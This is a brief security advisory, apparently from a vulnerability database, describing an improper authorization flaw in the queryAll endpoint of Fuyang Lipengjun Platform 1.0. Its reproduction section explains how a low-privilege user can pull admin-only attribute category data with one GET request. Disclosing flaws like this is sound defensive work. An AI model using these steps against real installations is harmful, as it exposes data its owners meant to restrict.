Fuyang Lipengjun Platform Improper Authorization Vulnerability in AttributeCategoryController
Vulnerability
An improper authorization vulnerability has been identified in Fuyang Lipengjun Platform version 1.0. The issue resides in the AttributeCategoryController, specifically within the queryAll function. This vulnerability allows authenticated users, regardless of their privilege level, to access a complete list of attribute categories. Such data access should be restricted to users with administrative rights. The vulnerability can be exploited remotely, and a public proof-of-concept exploit is available.
Impact
Exploitation of this vulnerability leads to unauthorized access to sensitive information, allowing users to view data they should not have permission to access.
Reproduction
To reproduce this vulnerability, log into the application with any user account, including those with low privileges. Then, send a GET request to the '/attributecategory/queryAll' endpoint. The server will respond with a full list of attribute category information, which is normally restricted to administrative users.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.